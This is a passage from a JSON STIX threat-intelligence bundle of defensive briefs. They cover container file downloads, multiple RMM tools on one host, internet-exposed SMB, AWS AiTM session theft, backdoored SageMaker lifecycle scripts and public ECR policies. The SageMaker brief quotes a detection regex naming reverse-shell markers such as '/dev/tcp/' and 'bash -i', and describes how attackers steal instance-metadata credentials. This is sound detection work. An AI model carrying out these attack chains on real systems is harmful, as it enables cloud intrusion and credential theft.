      "description": "## Overview\n\nThis threat brief details a detection rule from Elastic aimed at identifying malicious file downloads within Linux containers. The rule, released on February 6, 2026, and updated on June 30, 2026, focuses on interactive sessions where `curl` or `wget` command-line tools are used to retrieve files from external sources. Threat actors frequently leverage these tools for ingress tool transfer (MITRE ATT\u0026CK T1105), allowing them to stage additional payloads, tools, or data for subsequent execution and establishing application-layer command and control without embedding artifacts directly into container images. This behavior is crucial for defenders to monitor as it often signals a compromised container, unauthorized access, or preparation for further malicious activity, such as exfiltration or lateral movement within the Kubernetes cluster.\n\n## Impact\n\nIf this activity goes undetected, attackers can download and execute arbitrary code, tools, or malware within a compromised container, potentially leading to unauthorized access to sensitive data, establishing persistent command and control channels, or facilitating lateral movement across the containerized environment and underlying infrastructure. The execution of such downloaded payloads could result in data exfiltration, system compromise, resource abuse, or further stages of a multi-pronged attack. The lack of specific victim counts or targeted sectors in the source indicates a general threat applicable to any organization utilizing Linux containers.\n\n## Recommendation\n\n*   Deploy the Sigma rule provided in this brief to your SIEM and tune for your environment to detect `curl` or `wget` file downloads in containers.\n*   Attribute the interactive session to an initiator by correlating container `exec`/`attach` events with Kubernetes audit logs or Docker daemon logs to identify the user, source IP, and access path.\n*   Inspect the created file’s full path, size, format, and hash, then retrieve it from the container or node filesystem for static analysis and malware scanning.\n*   Pivot on the download destination (domain/IP/URL path) to review outbound connection telemetry, DNS/TLS indicators, and threat reputation, blocking suspicious endpoints at the egress.\n*   Review subsequent container activity after the download for follow-on actions such as `chmod`, interpreter execution, new processes, cron modifications, credential access, or lateral movement attempts.\n*   Harden your environment by removing `exec`/`attach` permissions from non-admin roles and enforcing runtime policies that block interactive `curl`/`wget` and restrict outbound traffic to approved destinations.\n",
      "published": "2026-07-03T15:48:22Z",
      "labels": [
        "container",
        "linux",
        "command-and-control",
        "execution",
        "cloud",
        "file-download"
      ],
      "object_refs": [
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml"
        },
        {
          "source_name": "reference",
          "url": "https://heilancoos.github.io/research/2025/12/16/kubernetes.html#kubelet-api"
        },
        {
          "source_name": "reference",
          "url": "https://www.cyberark.com/resources/threat-research-blog/using-kubelet-client-to-attack-the-kubernetes-cluster"
        },
        {
          "source_name": "reference",
          "url": "https://www.aquasec.com/blog/kubernetes-exposed-exploiting-the-kubelet-api/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Access Software",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1219",
          "url": "https://attack.mitre.org/techniques/T1219"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--62f8e176-9e50-5e1a-9e8a-0d538e4f39f7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--475d4163-db86-55e7-957b-e0d30383eec0",
      "target_ref": "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--475d4163-db86-55e7-957b-e0d30383eec0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Activity: Multiple Remote Management Tool Vendors on Same Host",
      "description": "## Overview\n\nThis detection rule identifies a suspicious behavioral pattern on Windows hosts where processes associated with two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed initiating within the same eight-minute window. This activity is considered suspicious because it can indicate unauthorized activity, such as an attacker establishing redundant persistence and command and control, the presence of shadow IT, or a potential system compromise. While some legitimate Managed Service Provider (MSP) environments might use multiple tools (e.g., ConnectWise Automate and TeamViewer), this pattern on standard user endpoints or servers warrants immediate investigation. The detection mechanism specifically maps known RMM process names to unique vendor labels (e.g., AnyDesk, Splashtop, NinjaOne), preventing false positives from multiple binaries of the same vendor. This detection helps security teams identify anomalous RMM usage, which is a common tactic for initial access brokers and post-exploitation activities.\n\n## Attack Chain\n\nThis detection focuses on identifying suspicious activity rather than a specific multi-stage attack chain. The presence of multiple RMM tools from distinct vendors typically occurs during the post-compromise phase, as attackers establish persistence and redundant command and control.\n\n## Impact\n\nIf not investigated and addressed, the presence of multiple, potentially unauthorized, remote management tools can lead to severe consequences. Attackers often deploy additional RMM tools to maintain persistence and establish redundant command and control channels, even after their primary access might be remediated. This increases the risk of data exfiltration, further lateral movement, deployment of ransomware, and long-term compromise of the affected host and wider network. Uncontrolled RMM installations also present a significant attack surface due to their elevated privileges and network access capabilities, making the host a critical pivot point for further malicious activities.\n\n## Recommendation\n\n*   Deploy the described detection logic to identify hosts exhibiting simultaneous process execution from multiple RMM vendors.\n*   Enable Sysmon Event ID 1 (Process Creation) and Windows process creation logging across your environment to ensure comprehensive coverage for process start events.\n*   Investigate alerts related to MITRE ATT\u0026CK technique T1219 (Remote Access Software) to determine legitimacy.\n*   For hosts triggering this detection, immediately investigate the Esql.vendors_seen and Esql.processes_executable_values fields to identify the specific tools involved.\n*   For servers or standard user endpoints, treat such alerts as high risk; review install sources, code signatures, and recent logons for the involved processes.\n*   Correlate alerts with other suspicious activities (e.g., ingress tool transfer, suspicious scripting, new persistence mechanisms) on the same host.\n*   Establish and enforce a clear policy for approved RMM software, ideally limiting to a single approved stack per asset class to reduce false positives and attack surface.\n",
      "published": "2026-07-03T15:47:17Z",
      "labels": [
        "command-and-control",
        "remote-access-software",
        "rmm",
        "windows",
        "behavioral-detection"
      ],
      "object_refs": [
        "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://attack.mitre.org/techniques/T1219/"
        },
        {
          "source_name": "reference",
          "url": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a"
        },
        {
          "source_name": "reference",
          "url": "https://lolrmm.io/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "External Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1133",
          "url": "https://attack.mitre.org/techniques/T1133"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--47e9e1c6-434b-5911-972e-63805d7eb94a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1b781a67-b438-5b01-9d42-6acbf81afa00",
      "target_ref": "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a41bec00-bc7e-5731-b43d-3bcb13394ede",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1b781a67-b438-5b01-9d42-6acbf81afa00",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d91deb8-0e31-58cf-bfb3-cbeda96d402c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1b781a67-b438-5b01-9d42-6acbf81afa00",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d904a676-2ac3-5522-a535-d80d4b39a1d1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1b781a67-b438-5b01-9d42-6acbf81afa00",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1b781a67-b438-5b01-9d42-6acbf81afa00",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "SMB (Windows File Sharing) Activity from the Internet",
      "description": "## Overview\n\nThis brief addresses the critical security risk of Windows Server Message Block (SMB) file sharing services being directly exposed to the internet. SMB (operating on TCP ports 139 and 445) is a fundamental component of Windows networking, designed for local network communication. Its direct exposure to the public internet is a severe misconfiguration, creating a primary target for threat actors seeking initial access. This exposure is a direct precondition for exploitation of well-known vulnerabilities, such as MS17-010 (EternalBlue, CVE-2017-0144), which has been leveraged in widespread attacks like WannaCry and NotPetya. The detection focuses on network events where inbound SMB traffic originates from a public IP address destined for a private internal IP, signifying a direct internet connection to an internal SMB service. Organizations must actively prevent this exposure to mitigate significant attack vectors.\n\n## Attack Chain\n\n1.  **External Reconnaissance**: Threat actors conduct internet-wide scans for publicly accessible hosts with open SMB ports (TCP 139 and 445).\n2.  **Initial Access**: An attacker initiates an SMB connection from a public IP address to a vulnerable internal host that has its SMB service inadvertently exposed to the internet.\n3.  **Exploitation of Public-Facing Application**: The attacker leverages known critical SMB vulnerabilities (e.g., EternalBlue, MS17-010 / CVE-2017-0144) to gain remote code execution on the exposed Windows system.\n4.  **Execution**: Upon successful exploitation, the attacker executes arbitrary commands, deploys backdoors, or stages additional malware on the compromised host, leading to process creation events or new services.\n5.  **Persistence**: The attacker establishes a persistent foothold within the network, often by creating new services, modifying registry run keys, or using scheduled tasks to maintain access.\n6.  **Impact**: The attacker proceeds with post-exploitation activities, which can include sensitive data exfiltration, deployment of ransomware (such as WannaCry or NotPetya), or lateral movement to further compromise the internal network.\n\n## Impact\n\nThe direct exposure of SMB services to the internet has catastrophic consequences, as demonstrated by previous global cyberattacks. Successful exploitation leads to unauthenticated remote code execution (RCE) on the vulnerable Windows system, granting attackers full control. This can result in widespread network compromise, including encryption of critical data by ransomware (e.g., WannaCry, NotPetya), complete data exfiltration, system destruction, and significant operational disruption. Financial and reputational damage for affected organizations can be immense. The potential victim scope includes any organization or individual with an internet-facing SMB service, regardless of size or sector.\n\n## Recommendation\n\n*   Deploy the Sigma rule included in this brief to your SIEM, ensuring network flow or firewall log data is ingested and correlated.\n*   Immediately close inbound TCP ports 139 and 445 at the firewall or security group level for all public-facing interfaces to prevent any inbound SMB traffic from the internet.\n*   Patch CVE-2017-0144 (MS17-010) and all related SMB vulnerabilities on all Windows hosts, prioritizing those with potential internet exposure.\n*   Audit all NAT and firewall rules to identify and remediate any misconfigurations that inadvertently expose internal SMB services.\n*   If a detection fires from the provided Sigma rule, investigate the destination host for signs of compromise, such as unexpected processes or new services, and isolate it if necessary.\n",
      "published": "2026-07-03T15:45:05Z",
      "labels": [
        "initial-access",
        "network",
        "windows",
        "smb",
        "vulnerability",
        "ms17-010"
      ],
      "object_refs": [
        "attack-pattern--c29bff81-a408-5684-8e30-56be5debd839",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0144"
        },
        {
          "source_name": "reference",
          "url": "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6cfad3d6-574b-5f01-ac79-4d5bb9868b1f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f07caf3f-a82b-5d0c-b043-82b6441578af",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Web Session Cookie",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1539",
          "url": "https://attack.mitre.org/techniques/T1539"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5847a77c-b41d-5ae4-b304-e23b39ee7200",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f07caf3f-a82b-5d0c-b043-82b6441578af",
      "target_ref": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f07caf3f-a82b-5d0c-b043-82b6441578af",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS IAM User Console Login from Multiple Geolocations",
      "description": "## Overview\n\nAdversaries are actively employing adversary-in-the-middle (AiTM) phishing and session theft techniques to compromise AWS IAM user accounts. This threat is characterized by a single IAM user successfully authenticating to the AWS Management Console from two or more geographically distinct countries within a brief timeframe, a physically impossible scenario. This behavior is a strong indicator of compromise, even when multi-factor authentication (MFA) appears satisfied, as AiTM proxies effectively relay the live MFA challenge from the legitimate user to the AWS login page. The attacker then uses the captured session or credentials to log in from their own infrastructure, leading to the divergent geolocation pattern. This technique poses a significant risk to AWS environments by providing unauthorized access to cloud resources, potentially leading to data exfiltration, resource manipulation, or further lateral movement within the compromised cloud infrastructure. This detection mechanism serves as a crucial CloudTrail-native analog to identity-provider impossible-travel alerts.\n\n## Attack Chain\n\n1.  **Initial Access (Phishing)**: The adversary initiates a phishing campaign, often through highly convincing emails targeting AWS IAM users, to entice them to visit a malicious website controlled by the attacker.\n2.  **AiTM Infrastructure Deployment**: The attacker sets up an adversary-in-the-middle (AiTM) proxy server, which acts as an intermediary between the victim's browser and the legitimate AWS Management Console login page.\n3.  **Credential and Session Theft**: When the victim attempts to log into AWS through the phishing site, the AiTM proxy relays their entered credentials (username, password) and any MFA responses to the legitimate AWS login page. Simultaneously, the proxy captures the session cookies returned by AWS.\n4.  **Concurrent Session Establishment**: As the legitimate user successfully logs in from their actual geographic location, the attacker immediately uses the captured session cookies or credentials to establish a separate, concurrent login session to the AWS Management Console from their own geographically distinct infrastructure.\n5.  **Persistence and Privilege Escalation**: Once inside, the attacker may modify the compromised IAM user's policies, create new access keys (`CreateAccessKey`), or alter login profiles to maintain persistence and potentially elevate privileges within the AWS environment.\n6.  **Impact (Data Exfiltration / Resource Manipulation)**: The attacker then leverages the unauthorized access to exfiltrate sensitive data from S3 buckets, deploy unauthorized compute resources (e.g., EC2 instances for cryptocurrency mining), or disrupt critical cloud services.\n\n## Impact\n\nA successful AiTM attack leading to impossible travel on AWS can result in severe consequences. Attackers gain full control over the compromised IAM user's permissions, enabling actions such as creating new access keys, modifying existing user policies to grant broader access, or even altering MFA configurations. This unauthorized access allows for direct data exfiltration from services like S3, deployment of malicious resources for illicit activities (e.g., launching EC2 instances for botnets or crypto mining), and disruption of business-critical cloud infrastructure. The ability to bypass MFA by relaying challenges makes this a particularly insidious threat, leading to significant financial loss, reputational damage, and potential compliance violations for affected organizations.\n\n## Recommendation\n\n*   Deploy the detection logic described in this brief to your SIEM, leveraging `AWS CloudTrail` logs for `signin.amazonaws.com` events.\n*   Review detections for `Esql.source_geo_country_iso_code_values` and `Esql.source_ip_values` to identify the origin of suspicious logins and verify against expected user activity.\n*   Investigate `aws.cloudtrail.user_identity.arn` for any suspicious hands-on-keyboard activities immediately following impossible travel alerts, such as `CreateAccessKey` events, changes to login profiles, or IAM policy modifications.\n*   For confirmed compromises, revoke the affected user's console sessions, force a password reset, rotate access keys, and reconfigure MFA.\n*   Migrate AWS Management Console access to AWS IAM Identity Center and enforce phishing-resistant MFA methods, such as FIDO2 security keys or passkeys, which are highly effective against AiTM relay attacks.\n",
      "published": "2026-07-03T15:41:58Z",
      "labels": [
        "cloud",
        "identity",
        "aws",
        "initial-access",
        "credential-access",
        "aitm-phishing",
        "session-theft",
        "impossible-travel"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/initial_access_console_login_iam_user_multiple_geolocations.toml"
        },
        {
          "source_name": "reference",
          "url": "https://securitylabs.datadoghq.com/articles/behind-the-console-aws-aitm-phishing-kit-and-beyond/"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Event Triggered Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1546",
          "url": "https://attack.mitre.org/techniques/T1546"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9f61625c-59d6-52d6-bffe-77966607da44",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3f6a58f6-75e4-59f6-ae8d-cc307953dfb2",
      "target_ref": "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--486dc5f8-a37f-5f81-b9dd-bf0790a036c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3f6a58f6-75e4-59f6-ae8d-cc307953dfb2",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3f6a58f6-75e4-59f6-ae8d-cc307953dfb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS SageMaker Notebook Lifecycle Configuration With Suspicious Script Content",
      "description": "## Overview\n\nThis threat involves the abuse of Amazon SageMaker notebook lifecycle configurations by attackers to establish persistence, steal credentials, or execute arbitrary code within an AWS environment. Lifecycle configurations, specifically their OnStart or OnCreate scripts, run with root privileges on SageMaker notebook instances. Attackers who have gained initial access to an AWS account and possess sufficient IAM permissions can inject malicious scripts, often base64 encoded to evade detection, into these configurations. Upon the start or creation of a SageMaker notebook instance linked to such a configuration, the script automatically executes, allowing the adversary to perform actions like setting up reverse shells, exfiltrating EC2 instance metadata credentials, creating new persistence mechanisms via `crontab` or `authorized_keys`, or deploying cryptominers. This activity is a strong indicator of post-compromise activity and a high-fidelity signal for an active implant attempt.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker obtains valid AWS credentials for an account, possibly through phishing, exposed access keys, or compromise of another service.\n2.  **Discovery \u0026 Privilege Escalation**: The attacker identifies that the compromised credentials possess permissions to create or update Amazon SageMaker Notebook Lifecycle Configurations (e.g., `sagemaker:CreateNotebookInstanceLifecycleConfig`, `sagemaker:UpdateNotebookInstanceLifecycleConfig`).\n3.  **Malicious Configuration Creation/Update**: The attacker uses these permissions to either create a new SageMaker notebook lifecycle configuration or modify an existing one.\n4.  **Script Injection**: A malicious shell script is injected into the `OnStart` or `OnCreate` section of the lifecycle configuration. This script often includes commands for reverse shells, credential exfiltration (e.g., from IMDS endpoint `169.254.169.254`), or persistence, and is frequently base64 encoded to obfuscate its content.\n5.  **Deployment**: The attacker then associates this malicious lifecycle configuration with a SageMaker notebook instance.\n6.  **Execution on Instance Start/Create**: When the affected SageMaker notebook instance is subsequently started or newly created, the injected `OnStart` or `OnCreate` script automatically executes with `root` privileges.\n7.  **Post-Execution Activities**: The executed script performs its malicious payload, such as establishing a persistent reverse shell connection, gathering temporary AWS credentials from the EC2 Instance Metadata Service (IMDS), configuring cron jobs, modifying SSH `authorized_keys`, or deploying cryptomining software.\n8.  **Impact**: The attacker gains persistent code execution capabilities, potentially exfiltrates sensitive AWS credentials, or further compromises the AWS environment, leading to data theft or resource abuse.\n\n## Impact\n\nIf this attack succeeds, the impact can be severe, leading to unauthorized access, data exfiltration, and resource abuse within the compromised AWS environment. Attackers gain `root` access to SageMaker notebook instances, enabling them to steal sensitive data, pivot to other AWS services using compromised execution role credentials, or establish long-term persistence within the organization's cloud infrastructure. This can result in significant financial losses due to resource misuse (e.g., cryptomining), reputational damage, and regulatory penalties. The scope of victims could include any organization utilizing Amazon SageMaker that has an AWS account vulnerable to credential compromise or misconfigured IAM policies.\n\n## Recommendation\n\n*   Deploy the provided ESQL detection logic (FROM logs-aws.cloudtrail-... `RLIKE` \".*(/dev/tcp/|/dev/udp/|bash -i|...\").\n*   Review the `Esql_priv.aws_cloudtrail_lifecycle_script` field for any suspicious patterns or decoded content when this rule alerts.\n*   Investigate the principal identified in `aws.cloudtrail.user_identity.arn` and correlate with `source.ip` and `user_agent.original` to determine if the activity was from an expected location or user.\n*   If unauthorized, immediately remove the affected lifecycle configuration and stop any SageMaker notebook instances associated with it.\n*   Rotate the credentials for the notebook execution role and any IAM principal identified in `aws.cloudtrail.user_identity.arn` that performed the suspicious action.\n*   Implement strong IAM policies to restrict `sagemaker:CreateNotebookInstanceLifecycleConfig` and `sagemaker:UpdateNotebookInstanceLifecycleConfig` permissions to only trusted administrators.\n",
      "published": "2026-07-03T15:40:50Z",
      "labels": [
        "cloud",
        "aws",
        "sagemaker",
        "persistence",
        "execution",
        "backdoor",
        "credential-theft"
      ],
      "object_refs": [
        "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/sagemaker/latest/dg/notebook-lifecycle-config.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Transfer Data to Cloud Account",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1537",
          "url": "https://attack.mitre.org/techniques/T1537"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7e95f6ac-3ea9-5b2a-a956-54c85146c833",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--686ce568-e823-5e33-a1cd-c84a8ecbfce8",
      "target_ref": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--686ce568-e823-5e33-a1cd-c84a8ecbfce8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS ECR Repository or Registry Policy Granted Public Access",
      "description": "## Overview\n\nThis threat involves the modification of an Amazon Elastic Container Registry (ECR) policy to grant public access, which can be performed by an attacker who has gained initial access to an AWS account or by an insider with appropriate permissions, or inadvertently by a legitimate user. The malicious activity specifically targets the `SetRepositoryPolicy` or `PutRegistryPolicy` API calls to include a policy document with an `Allow` effect for a wildcard principal (`\"*\"`), effectively opening the container registry to all identities, including unauthenticated users. This misconfiguration, once established, can lead to the exfiltration of sensitive, proprietary container images, including any embedded secrets, posing a significant data breach risk. Furthermore, if the public policy also permits `push` actions, an adversary can implant malicious container images into the registry, leading to a severe supply chain compromise when these backdoored images are subsequently deployed by downstream services such as AWS ECS, EKS, or Lambda workloads.\n\n## Attack Chain\n\n1.  An attacker gains initial access to an AWS account through compromised credentials, insecure access keys, or by exploiting vulnerabilities in connected services.\n2.  The attacker, leveraging the compromised credentials, executes an `ecr:SetRepositoryPolicy` or `ecr:PutRegistryPolicy` API call to modify an existing ECR repository or registry policy.\n3.  The API request includes a crafted policy document that sets an `Allow` effect for a `Principal` field containing `\"*\"`, thereby granting public access.\n4.  The ECR service successfully processes the policy update, making the specified repository or registry publicly accessible for `pull` actions (e.g., `ecr:BatchGetImage`, `ecr:GetDownloadUrlForLayer`).\n5.  The attacker, or any other unauthorized entity, can now pull proprietary container images from the ECR repository, leading to the exfiltration of intellectual property, sensitive configurations, and hardcoded secrets.\n6.  (Optional) If the publicly exposed policy also grants `push` permissions (e.g., `ecr:PutImage`, `ecr:UploadLayerPart`), the attacker can push malicious or backdoored container images to the repository.\n7.  Downstream services and applications (e.g., AWS ECS tasks, EKS pods, Lambda functions) configured to pull images from this repository will then fetch and deploy the compromised images.\n8.  This deployment leads to a supply chain compromise, allowing the attacker to execute arbitrary code, establish persistence, or further expand their presence within the victim's cloud environment.\n\n## Impact\n\nThe primary impact of public ECR access is the exfiltration of sensitive data, including proprietary source code, application configurations, and hardcoded secrets (such as API keys, database credentials) that are baked into container images. Organizations across all sectors utilizing AWS ECR are susceptible. If the policy permits push access, the impact escalates to a supply chain attack, where adversaries can inject malicious code into deployed applications, leading to widespread system compromise, data breaches, and potential operational disruption. This could affect numerous downstream services within an organization's cloud infrastructure, potentially compromising customer data or critical business processes.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"AWS ECR Repository or Registry Policy Granted Public Access\" in this brief to your SIEM and tune for your environment, paying close attention to `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.type`.\n*   Review AWS CloudTrail logs for `SetRepositoryPolicy` or `PutRegistryPolicy` events to identify any unauthorized or unintended policy changes.\n*   Restrict `ecr:SetRepositoryPolicy` and `ecr:PutRegistryPolicy` permissions within your AWS accounts to only trusted administrators using AWS IAM policies.\n*   Ensure that any publicly exposed ECR repositories identified by the Sigma rule are intentionally public, that the access is strictly pull-only, and that their contents do not contain any sensitive data.\n*   Regularly audit ECR repository policies for adherence to the principle of least privilege, specifically checking for `Principal:\"*\"` statements.\n",
      "published": "2026-07-03T15:39:49Z",
      "labels": [
        "cloud",
        "aws",
        "ecr",
        "exfiltration",
        "supply-chain"
      ],
      "object_refs": [
        "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_SetRepositoryPolicy.html"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/AmazonECR/latest/userguide/repository-policies.html"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/exfiltration_ecr_repository_policy_granted_public_access.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
